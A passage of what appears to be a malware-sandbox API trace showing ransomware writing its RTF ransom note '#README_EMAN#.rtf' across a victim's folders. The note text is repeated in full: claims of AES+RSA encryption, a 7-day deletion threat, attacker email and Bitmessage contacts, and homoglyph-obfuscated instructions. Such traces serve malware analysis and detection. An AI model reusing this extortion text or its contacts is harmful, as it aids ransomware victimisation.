m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245c778, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nù^=«\x16O\x1fïж>\x9bXË\x7fEóO¸Ù\x0c0\x9a\x03\x1f", lpUsedDefaultChar=0x0) returned 8717 [0281.657] WriteFile (in: hFile=0x2c8, lpBuffer=0x245c778*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245c778*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0281.657] CloseHandle (hObject=0x2c8) returned 1 [0281.658] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\#readme_eman#.rtf")) returned 0xffffffff [0281.658] GetLastError () returned 0x2 [0281.658] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0281.658] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0281.658] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0281.658] WideCharToMultiByte (in: 